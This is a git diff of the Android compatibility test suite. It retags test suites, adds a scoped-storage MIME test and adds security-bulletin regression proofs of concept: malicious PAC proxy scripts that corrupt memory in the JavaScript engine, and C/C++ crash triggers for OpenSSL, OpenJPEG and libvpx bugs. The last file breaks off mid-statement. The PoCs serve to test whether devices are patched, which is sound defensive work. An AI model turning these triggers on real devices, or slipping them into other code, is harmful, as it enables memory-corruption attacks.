["ScopedStorageTestHelper/src/**/*.java"], // Tag as a CTS artifact - test_suites: ["device-tests", "mts", "cts"], + test_suites: ["device-tests", "mts-mediaprovider", "cts"], } android_test_helper_app { name: "CtsScopedStorageTestAppDLegacy", @@ -57,7 +57,7 @@ android_test_helper_app { target_sdk_version: "28", srcs: ["ScopedStorageTestHelper/src/**/*.java"], // Tag as a CTS artifact - test_suites: ["device-tests", "mts", "cts"], + test_suites: ["device-tests", "mts-mediaprovider", "cts"], } android_test_helper_app { @@ -67,7 +67,7 @@ android_test_helper_app { sdk_version: "test_current", srcs: ["ScopedStorageTestHelper/src/**/*.java"], // Tag as a CTS artifact - test_suites: ["device-tests", "mts", "cts"], + test_suites: ["device-tests", "mts-mediaprovider", "cts"], } android_test { @@ -76,7 +76,7 @@ android_test { srcs: ["src/**/*.java"], static_libs: ["truth-prebuilt", "cts-scopedstorage-lib"], compile_multilib: "both", - test_suites: ["general-tests", "mts", "cts"], + test_suites: ["general-tests", "mts-mediaprovider", "cts"], sdk_version: "test_current", java_resources: [ ":CtsScopedStorageTestAppA", @@ -91,7 +91,7 @@ android_test { srcs: ["legacy/src/**/*.java"], static_libs: ["truth-prebuilt", "cts-scopedstorage-lib"], compile_multilib: "both", - test_suites: ["general-tests", "mts", "cts"], + test_suites: ["general-tests", "mts-mediaprovider", "cts"], sdk_version: "test_current", target_sdk_version: "29", java_resources: [ @@ -106,7 +106,7 @@ java_test_host { "host/src/android/scopedstorage/cts/host/BaseHostTestCase.java" ], libs: ["tradefed", "testng"], - test_suites: ["general-tests", "mts", "cts"], + test_suites: ["general-tests", "mts-mediaprovider", "cts"], test_config: "CoreTest.xml", } @@ -114,7 +114,7 @@ java_test_host { name: "CtsScopedStorageHostTest", srcs: ["host/src/**/*.java"], libs: ["tradefed", "testng"], - test_suites: ["general-tests", "mts", "cts"], + test_suites: ["general-tests", "mts-mediaprovider", "cts"], test_config: "AndroidTest.xml", } @@ -122,7 +122,7 @@ java_test_host { name: "CtsScopedStoragePublicVolumeHostTest", srcs: ["host/src/**/*.java"], libs: ["tradefed", "testng"], - test_suites: ["general-tests", "mts"], + test_suites: ["general-tests", "mts-mediaprovider"], test_config: "PublicVolumeTest.xml", } @@ -133,7 +133,7 @@ android_test { srcs: ["device/**/*.java"], static_libs: ["truth-prebuilt", "cts-scopedstorage-lib"], compile_multilib: "both", - test_suites: ["device-tests", "mts", "cts"], + test_suites: ["device-tests", "mts-mediaprovider", "cts"], sdk_version: "test_current", libs: ["android.test.base", "android.test.mock", "android.test.runner",], java_resources: [ diff --git a/hostsidetests/scopedstorage/device/src/android/scopedstorage/cts/device/ScopedStorageDeviceTest.java b/hostsidetests/scopedstorage/device/src/android/scopedstorage/cts/device/ScopedStorageDeviceTest.java index 966f96d82c3..81d40d2d14a 100644 --- a/hostsidetests/scopedstorage/device/src/android/scopedstorage/cts/device/ScopedStorageDeviceTest.java +++ b/hostsidetests/scopedstorage/device/src/android/scopedstorage/cts/device/ScopedStorageDeviceTest.java @@ -211,7 +211,8 @@ public class ScopedStorageDeviceTest extends ScopedStorageBaseDeviceTest { @Parameter(0) public String mVolumeName; - @Parameters + /** Parameters data. */ + @Parameters(name = "volume={0}") public static Iterable<? extends Object> data() { return ScopedStorageDeviceTest.getTestParameters(); } @@ -1536,6 +1537,39 @@ public class ScopedStorageDeviceTest extends ScopedStorageBaseDeviceTest { } /** + * Test that ScanFile() after renaming file extension updates the right + * MIME type from the file metadata. + */ + @Test + public void testScanUpdatesMimeTypeForRenameFileExtension() throws Exception { + final String audioFileName = "ScopedStorageDeviceTest_" + NONCE; + final File mpegFile = new File(getMusicDir(), audioFileName + ".mp3"); + final File nonMpegFile = new File(getMusicDir(), audioFileName + ".snd"); + try { + // Copy audio content to mpegFile + try (InputStream in = + getContext().getResources().openRawResource(R.raw.test_audio); + FileOutputStream out = new FileOutputStream(mpegFile)) { + FileUtils.copy(in, out); + out.getFD().sync(); + } + assertThat(MediaStore.scanFile(getContentResolver(), mpegFile)).isNotNull(); + assertThat(getFileMimeTypeFromDatabase(mpegFile)).isEqualTo("audio/mpeg"); + + // This rename changes MIME type from audio/mpeg to audio/basic + assertCanRenameFile(mpegFile, nonMpegFile); + assertThat(getFileMimeTypeFromDatabase(nonMpegFile)).isNotEqualTo("audio/mpeg"); + + assertThat(MediaStore.scanFile(getContentResolver(), nonMpegFile)).isNotNull(); + // Above scan should read file metadata and update the MIME type to audio/mpeg + assertThat(getFileMimeTypeFromDatabase(nonMpegFile)).isEqualTo("audio/mpeg"); + } finally { + mpegFile.delete(); + nonMpegFile.delete(); + } + } + + /** * Test that app without write permission for file can't update the file. */ @Test diff --git a/hostsidetests/scopedstorage/libs/ScopedStorageTestLib/src/android/scopedstorage/cts/lib/TestUtils.java b/hostsidetests/scopedstorage/libs/ScopedStorageTestLib/src/android/scopedstorage/cts/lib/TestUtils.java index 80a90c18b10..19d521d010d 100644 --- a/hostsidetests/scopedstorage/libs/ScopedStorageTestLib/src/android/scopedstorage/cts/lib/TestUtils.java +++ b/hostsidetests/scopedstorage/libs/ScopedStorageTestLib/src/android/scopedstorage/cts/lib/TestUtils.java @@ -823,7 +823,7 @@ public class TestUtils { */ public static void assertDirectoryContains(@NonNull File dir, File... expectedContent) { assertThat(dir.isDirectory()).isTrue(); - assertThat(Arrays.asList(dir.listFiles())).containsAllIn(expectedContent); + assertThat(Arrays.asList(dir.listFiles())).containsAtLeastElementsIn(expectedContent); } public static File getExternalStorageDir() { diff --git a/hostsidetests/scopedstorage/res/raw/test_audio.mp3 b/hostsidetests/scopedstorage/res/raw/test_audio.mp3 Binary files differnew file mode 100644 index 00000000000..4fe9228331d --- /dev/null +++ b/hostsidetests/scopedstorage/res/raw/test_audio.mp3 diff --git a/hostsidetests/security/src/android/security/cts/SELinuxHostTest.java b/hostsidetests/security/src/android/security/cts/SELinuxHostTest.java index de90629d340..b63e4ca75c9 100644 --- a/hostsidetests/security/src/android/security/cts/SELinuxHostTest.java +++ b/hostsidetests/security/src/android/security/cts/SELinuxHostTest.java @@ -222,6 +222,8 @@ public class SELinuxHostTest extends DeviceTestCase implements IBuildReceiver, I File systemSepolicyCilFile = File.createTempFile("plat_sepolicy", ".cil"); systemSepolicyCilFile.deleteOnExit(); + File fileContextsFile = File.createTempFile("file_contexts", ".txt"); + fileContextsFile.deleteOnExit(); assertTrue(device.pullFile("/system/etc/selinux/plat_sepolicy.cil", systemSepolicyCilFile)); @@ -229,6 +231,7 @@ public class SELinuxHostTest extends DeviceTestCase implements IBuildReceiver, I secilc.getAbsolutePath(), "-m", "-M", "true", "-c", "30", "-o", builtPolicyFile.getAbsolutePath(), + "-f", fileContextsFile.getAbsolutePath(), systemSepolicyCilFile.getAbsolutePath()); pb.redirectOutput(ProcessBuilder.Redirect.PIPE); pb.redirectErrorStream(true); diff --git a/hostsidetests/securitybulletin/Android.bp b/hostsidetests/securitybulletin/Android.bp index f17395ee944..49c5dfddd11 100644 --- a/hostsidetests/securitybulletin/Android.bp +++ b/hostsidetests/securitybulletin/Android.bp @@ -37,11 +37,12 @@ cc_defaults { compile_multilib: "both", multilib: { lib32: { - suffix: "32", + suffix: "_sts32", }, lib64: { - suffix: "64", + suffix: "_sts64", }, + // build/soong/common/arch.go default returns nil; no default possible }, arch: { arm: { diff --git a/hostsidetests/securitybulletin/AndroidTest.xml b/hostsidetests/securitybulletin/AndroidTest.xml index a6b5c79b0fc..bd55c9b0097 100644 --- a/hostsidetests/securitybulletin/AndroidTest.xml +++ b/hostsidetests/securitybulletin/AndroidTest.xml @@ -27,7 +27,6 @@ <target_preparer class="com.android.tradefed.targetprep.suite.SuiteApkInstaller"> <option name="cleanup-apks" value="true" /> - <option name="test-file-name" value="OomCatcher.apk" /> <option name="test-file-name" value="MainlineModuleDetector.apk" /> <option name="test-file-name" value="hotspot.apk" /> </target_preparer> diff --git a/hostsidetests/securitybulletin/res/cve_2020_0224.pac b/hostsidetests/securitybulletin/res/cve_2020_0224.pac new file mode 100644 index 00000000000..6b8f6895d24 --- /dev/null +++ b/hostsidetests/securitybulletin/res/cve_2020_0224.pac @@ -0,0 +1,74 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +function gc() { + for (let i = 0; i < 0x10; i++) + new ArrayBuffer(0x800000); +} +function to_dict(obj) { +obj.__defineGetter__('x',()=>2); +obj.__defineGetter__('x',()=>2); +} +function fk() { +rgx = null; +dbl_arr = [1.1, 2.2, 3.3, 4.4]; +o = {}; +o.__defineGetter__("length", ()=> { + rgx = new RegExp(/AAAAAAAA/y); + return 2; + }); +o[0] = "aaaa"; +o.__defineGetter__(1, ()=> { + for (let i=0;i<8;i++) dbl_arr.push(5.5); + + let cnt = 0; + rgx[Symbol.replace]("AAAAAAAA", { + toString: ()=> { + cnt++; + if (cnt == 2) { + rgx.lastIndex = {valueOf: ()=> { + to_dict(rgx); + gc(); + return 0; + }}; + + } + + return 'BBBB$'; + } + }); + return "bbbb"; + }); +p = new Proxy( {}, { + ownKeys: function(target) { + return o; + }, + getOwnPropertyDescriptor(target, prop) { + return {configurable: true, enumerable: true, value: 5}; + } + }); + +Object.keys(p); +alert (dbl_arr[0]); +if (dbl_arr[0] == 1.1) { + fail("failed to corrupt dbl_arr"); +} +} + +function FindProxyForURL(url, host) { +fk(); +return "DIRECT"; +} diff --git a/hostsidetests/securitybulletin/res/cve_2020_0383.info b/hostsidetests/securitybulletin/res/cve_2020_0383.info Binary files differnew file mode 100644 index 00000000000..175c47c9f57 --- /dev/null +++ b/hostsidetests/securitybulletin/res/cve_2020_0383.info diff --git a/hostsidetests/securitybulletin/res/cve_2020_0383.xmf b/hostsidetests/securitybulletin/res/cve_2020_0383.xmf Binary files differnew file mode 100644 index 00000000000..921efe1eb38 --- /dev/null +++ b/hostsidetests/securitybulletin/res/cve_2020_0383.xmf diff --git a/hostsidetests/securitybulletin/res/cve_2021_0393.pac b/hostsidetests/securitybulletin/res/cve_2021_0393.pac new file mode 100644 index 00000000000..42038b61549 --- /dev/null +++ b/hostsidetests/securitybulletin/res/cve_2021_0393.pac @@ -0,0 +1,22 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +function FindProxyForURL(url, host) { + let s = String.fromCharCode(0x4141).repeat(0x10000001) + "A"; + s = "'" + s + "'"; + eval(s); + return "DIRECT"; +} diff --git a/hostsidetests/securitybulletin/res/cve_2021_0396.pac b/hostsidetests/securitybulletin/res/cve_2021_0396.pac new file mode 100644 index 00000000000..5677445a03b --- /dev/null +++ b/hostsidetests/securitybulletin/res/cve_2021_0396.pac @@ -0,0 +1,23 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +function FindProxyForURL(url, host){ + var evil_call = eval("(function(" + Array(65535).fill("x").join(",") + "){})"); + f(evil_call()); + return "DIRECT"; +} + +function f(){} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2015-3873/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2015-3873/Android.bp index 6f087cc64a7..10bbf66d052 100644 --- a/hostsidetests/securitybulletin/securityPatch/CVE-2015-3873/Android.bp +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2015-3873/Android.bp @@ -26,9 +26,6 @@ cc_test { "frameworks/av/media/libmedia/include", ], multilib: { - lib32: { - suffix: "32", - }, lib64: { shared_libs: [ "libstagefright", @@ -37,7 +34,6 @@ cc_test { "libstagefright_foundation", "libdatasource", ], - suffix: "64", }, }, } diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2182/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2182/Android.bp new file mode 100644 index 00000000000..9a853179387 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2182/Android.bp @@ -0,0 +1,27 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ +cc_test { + name: "CVE-2016-2182", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ], + shared_libs: [ + "libcrypto", + "libssl", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2182/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2182/poc.cpp new file mode 100644 index 00000000000..78e1e732fea --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2182/poc.cpp @@ -0,0 +1,138 @@ +/** + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <dlfcn.h> +#include <string.h> +#include <openssl/ssl.h> +#include <openssl/crypto.h> +#include <openssl/bn.h> +#include <memory> +#include "../includes/common.h" + +/** NOTE: These values are for the BIGNUM declared in kBN2DecTests and */ +/** must be updated if kBN2DecTests is changed. */ +#if _32_BIT +#define ALLOCATION_SIZE 52 +static const int sMallocSkipCount[] = {1,0}; +#else +#define ALLOCATION_SIZE 56 +static const int sMallocSkipCount[] = {0,0}; +#endif + +static const char *kTest = + "123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890"; + +static int sCount = 0; +static bool sOverloadMalloc = false; +int loopIndex = 0; + +template<typename T> +struct OpenSSLFree { + void operator()(T *buf) { + OPENSSL_free(buf); + } +}; + +using ScopedOpenSSLString = std::unique_ptr<char, OpenSSLFree<char>>; + +namespace crypto { +template<typename T, void (*func)(T*)> +struct OpenSSLDeleter { + void operator()(T *obj) { + func(obj); + } +}; + +template<typename Type, void (*Destroyer)(Type*)> +struct OpenSSLDestroyer { + void operator()(Type* ptr) const { + Destroyer(ptr); + } +}; + +template<typename T, void (*func)(T*)> +using ScopedOpenSSLType = std::unique_ptr<T, OpenSSLDeleter<T, func>>; + +template<typename PointerType, void (*Destroyer)(PointerType*)> +using ScopedOpenSSL = +std::unique_ptr<PointerType, OpenSSLDestroyer<PointerType, Destroyer>>; + +struct OpenSSLFree { + void operator()(uint8_t* ptr) const { + OPENSSL_free(ptr); + } +}; + +using ScopedBIGNUM = ScopedOpenSSL<BIGNUM, BN_free>; +using ScopedBN_CTX = ScopedOpenSSLType<BN_CTX, BN_CTX_free>; +} // namespace crypto + +static int DecimalToBIGNUM(crypto::ScopedBIGNUM *out, const char *in) { + BIGNUM *raw = nullptr; + int ret = BN_dec2bn(&raw, in); + out->reset(raw); + return ret; +} + +void* (*realMalloc)(size_t) = nullptr; + +void mtraceInit(void) { + realMalloc = (void *(*)(size_t))dlsym(RTLD_NEXT, "malloc"); + return; +} + +void *malloc(size_t size) { + if (realMalloc == nullptr) { + mtraceInit(); + } + if (!sOverloadMalloc) { + return realMalloc(size); + } + if (size == ALLOCATION_SIZE) { + if (sCount >= sMallocSkipCount[loopIndex]) { + return nullptr; + } + ++sCount; + } + return realMalloc(size); +} + +using namespace crypto; + +int main() { + CRYPTO_library_init(); + ScopedBN_CTX ctx(BN_CTX_new()); + if (!ctx) { + return EXIT_FAILURE; + } + for(loopIndex = 0; loopIndex < 2; ++loopIndex) { + ScopedBIGNUM bn; + int ret = DecimalToBIGNUM(&bn, kTest); + if (!ret) { + return EXIT_FAILURE; + } + sOverloadMalloc = true; + ScopedOpenSSLString dec(BN_bn2dec(bn.get())); + sOverloadMalloc = false; + if (!dec) { + return EXIT_FAILURE; + } + if (strcmp(dec.get(), kTest)) { + return EXIT_FAILURE; + } + } + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2485/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2485/Android.bp index c2b7636bb79..630cb39bc3e 100644 --- a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2485/Android.bp +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2485/Android.bp @@ -39,10 +39,6 @@ cc_test { "android.hidl.allocator@1.0", "android.hardware.media.omx@1.0", ], - suffix: "32", - }, - lib64: { - suffix: "64", }, }, } diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-8332/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2016-8332/Android.bp new file mode 100644 index 00000000000..bbe6c7bab0c --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-8332/Android.bp @@ -0,0 +1,33 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ +cc_test { + name: "CVE-2016-8332", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.c", + ":cts_hostsidetests_securitybulletin_memutils", + ], + cflags: [ + "-DCHECK_OVERFLOW", + ], + shared_libs: [ + "libpdfium", + ], + include_dirs: [ + "external/pdfium/third_party/libopenjpeg20", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-8332/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2016-8332/poc.c new file mode 100644 index 00000000000..86cbaec9050 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-8332/poc.c @@ -0,0 +1,141 @@ +/** + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +#define _GNU_SOURCE +#include <sys/types.h> +#include <sys/wait.h> +#include <string.h> +#include <stdlib.h> +#include "openjpeg.h" +#include "opj_includes.h" + +#define REPEATVALUES 100000 + +unsigned char gStartValues[] = { 0xFF, 0x4F, 0xFF, 0x51, 0x00, 0x2F, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x2E, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x2E, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x07, 0x01, + 0x01, 0x07, 0x01, 0x01, 0x07, 0x01, 0x01, 0xFF, 0x64, 0x00, 0x23, 0x00, + 0x01, 0x43, 0x72, 0x65, 0x61, 0x74, 0x6F, 0x72, 0x3A, 0x20, 0x4A, 0x61, + 0x73, 0x50, 0x65, 0x72, 0x20, 0x56, 0x65, 0x72, 0x73, 0x69, 0x6F, 0x6E, + 0x20, 0x31, 0x2E, 0x37, 0x30, 0x30, 0x2E, 0x31, 0xFF, 0x52, 0x00, 0x0C, + 0x00, 0x00, 0x00, 0x01, 0x01, 0x05, 0x04, 0x04, 0x00, 0x01, 0xFF, 0x5C, + 0x00, 0x13, 0x40, 0x40, 0x48, 0x48, 0x50, 0x48, 0x48, 0x50, 0x48, 0x48, + 0x50, 0x48, 0x48, 0x50, 0x48, 0x48, 0x50, 0xFF, 0x5D, 0x00, 0x14, 0x01, + 0x40, 0x40, 0x48, 0x48, 0x50, 0x48, 0x48, 0x50, 0x48, 0x48, 0x50, 0x48, + 0x48, 0x50, 0x48, 0x48, 0x50, 0xFF, 0x5D, 0x00, 0x14, 0x02, 0x40, 0x40, + 0x48, 0x48, 0x50, 0x48, 0x48, 0x50, 0x48, 0x48, 0x50, 0x48, 0x48, 0x50, + 0x48, 0x48, 0x50 }; +unsigned int gNumStartValues = sizeof(gStartValues) / sizeof(gStartValues[0]); + +unsigned char gRepeatValues[] = { 0xFF, 0x75, 0x00, 0x09, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00 }; +unsigned int gNumRepeatValues = sizeof(gRepeatValues) + / sizeof(gRepeatValues[0]); + +unsigned char gLastValues[] = { 0xFF, 0x75, 0x00, 0x09, 0x00, 0x00, 0x01, 0x00, + 0x00, 0x00, 0x00 }; +unsigned int gNumLastValues = sizeof(gLastValues) / sizeof(gLastValues[0]); + +typedef struct { + char* blob; + ssize_t blobSize; + ssize_t readPos; +} applicationContext; + +opj_stream_t* allocate_stream(void) { + opj_stream_private_t * stream = NULL; + + stream = (opj_stream_private_t*) opj_calloc(1, sizeof(opj_stream_private_t)); + if (!stream) { + return NULL; + } + + stream->m_buffer_size = OPJ_J2K_STREAM_CHUNK_SIZE; + stream->m_stored_data = (OPJ_BYTE *) opj_malloc(OPJ_J2K_STREAM_CHUNK_SIZE); + if (!stream->m_stored_data) { + opj_free(stream); + return NULL; + } + + stream->m_current_data = stream->m_stored_data; + stream->m_status |= OPJ_STREAM_STATUS_INPUT; + stream->m_opj_skip = opj_stream_read_skip; + stream->m_opj_seek = opj_stream_read_seek; + stream->m_read_fn = opj_stream_default_read; + stream->m_write_fn = opj_stream_default_write; + stream->m_skip_fn = opj_stream_default_skip; + stream->m_seek_fn = opj_stream_default_seek; + + return (opj_stream_t *) stream; +} + +static OPJ_SIZE_T ReadHandler(void *buffer, OPJ_SIZE_T length, void *context) { + applicationContext* appContext = (applicationContext*) context; + ssize_t count = 0; + ssize_t rem = 0; + if (!appContext) { + return ((OPJ_SIZE_T) - 1); + } + rem = appContext->blobSize - appContext->readPos; + if ((ssize_t) length <= rem) { + count = length; + } else { + count = rem; + } + memcpy(buffer, &appContext->blob[appContext->readPos], count); + appContext->readPos += count; + return ((OPJ_SIZE_T) length); +} + +int main(void) { + ssize_t offset = 0; + unsigned int count = 0; + applicationContext sContext; + opj_j2k_t* codec = NULL; + opj_stream_t* stream = NULL; + opj_image_t* image = NULL; + opj_stream_private_t* private = NULL; + opj_event_mgr_t eventMgr; + stream = allocate_stream(); + private = (opj_stream_private_t*)stream; + + sContext.blobSize = gNumStartValues + REPEATVALUES * gNumRepeatValues + + gNumLastValues; + sContext.blob = (char*) opj_malloc(sContext.blobSize); + if (!sContext.blob) { + return EXIT_FAILURE; + } + memset(sContext.blob, 0, sContext.blobSize); + + memcpy(&sContext.blob[offset], gStartValues, gNumStartValues); + offset += gNumStartValues; + for (count = 0; count < REPEATVALUES; ++count) { + memcpy(&sContext.blob[offset], gRepeatValues, gNumRepeatValues); + offset += gNumRepeatValues; + } + memcpy(&sContext.blob[offset], gLastValues, gNumLastValues); + offset += gNumLastValues; + sContext.readPos = 0; + private->m_read_fn = ReadHandler; + private->m_user_data = (void*)&sContext; + private->m_user_data_length = sContext.blobSize; + private->m_free_user_data_fn = NULL; + codec = opj_j2k_create_decompress(); + opj_set_default_event_handler(&eventMgr); + opj_j2k_read_header(private,codec,&image,&eventMgr); + opj_free(sContext.blob); + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-13180/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13180/Android.bp index 213958373f2..a3928d7a57a 100644 --- a/hostsidetests/securitybulletin/securityPatch/CVE-2017-13180/Android.bp +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13180/Android.bp @@ -39,10 +39,6 @@ cc_test { "android.hidl.allocator@1.0", "android.hardware.media.omx@1.0", ], - suffix: "32", - }, - lib64: { - suffix: "64", }, }, } diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-13194/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13194/Android.bp new file mode 100644 index 00000000000..9b478eb8340 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13194/Android.bp @@ -0,0 +1,36 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ +cc_test { + name: "CVE-2017-13194", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + compile_multilib: "64", + shared_libs: [ + "liblog", + ], + include_dirs: [ + "external/libvpx/libvpx", + "external/libvpx/libvpx/vpx_ports", + ], + cflags: [ + "-DCHECK_OVERFLOW", + "-DENABLE_SELECTIVE_OVERLOADING", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2017-13194/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13194/poc.cpp new file mode 100644 index 00000000000..f11cac935ed --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2017-13194/poc.cpp @@ -0,0 +1,127 @@ +/** + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <dlfcn.h> +#include <stdlib.h> +#include <string.h> +#include <sys/time.h> +#include <sys/types.h> +#include <sys/wait.h> +#include "../includes/memutils.h" +#include "vpx/vp8cx.h" +#include "vpx/vpx_codec.h" +#include "vpx/vpx_encoder.h" + +#define ENCODE_WIDTH 11 +#define ENCODE_HEIGHT 10000 +#define LIBNAME "/system/apex/com.android.media.swcodec/lib64/libvpx.so" +#define LIBNAME_APEX "/apex/com.android.media.swcodec/lib64/libvpx.so" + +char enable_selective_overload = ENABLE_NONE; + +int main() { + enable_selective_overload = ENABLE_ALL; + void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL); + if (!libHandle) { + libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL); + if (!libHandle) { + return EXIT_FAILURE; + } + } + vpx_codec_err_t codec_return = VPX_CODEC_OK; + vpx_codec_enc_cfg_t mCodecConfiguration; + vpx_image_t raw_frame; + uint32_t framerate = (30 << 16); + vpx_codec_iface_t *(*func_ptr1)() = + (vpx_codec_iface_t * (*)()) dlsym(libHandle, "vpx_codec_vp8_cx"); + if (!func_ptr1) { + dlclose(libHandle); + return EXIT_FAILURE; + } + vpx_codec_iface_t *mCodecInterface = (*func_ptr1)(); + if (!mCodecInterface) { + dlclose(libHandle); + return EXIT_FAILURE; + } + vpx_codec_err_t (*func_ptr2)(vpx_codec_iface_t *, vpx_codec_enc_cfg_t *, unsigned int) = + (vpx_codec_err_t(*)(vpx_codec_iface_t *, vpx_codec_enc_cfg_t *, unsigned int))dlsym( + libHandle, "vpx_codec_enc_config_default"); + if (!func_ptr2) { + dlclose(libHandle); + return EXIT_FAILURE; + } + codec_return = (*func_ptr2)(mCodecInterface, &mCodecConfiguration, 0); + mCodecConfiguration.g_w = ENCODE_WIDTH; + mCodecConfiguration.g_h = ENCODE_HEIGHT; + vpx_codec_ctx_t mCodecContext; + vpx_codec_err_t (*func_ptr3)(vpx_codec_ctx_t *, vpx_codec_iface_t *, vpx_codec_enc_cfg_t *, + vpx_codec_flags_t, int) = + (vpx_codec_err_t(*)(vpx_codec_ctx_t *, vpx_codec_iface_t *, vpx_codec_enc_cfg_t *, + vpx_codec_flags_t, int))dlsym(libHandle, "vpx_codec_enc_init_ver"); + if (!func_ptr3) { + dlclose(libHandle); + return EXIT_FAILURE; + } + codec_return = (*func_ptr3)(&mCodecContext, mCodecInterface, &mCodecConfiguration, 0, + 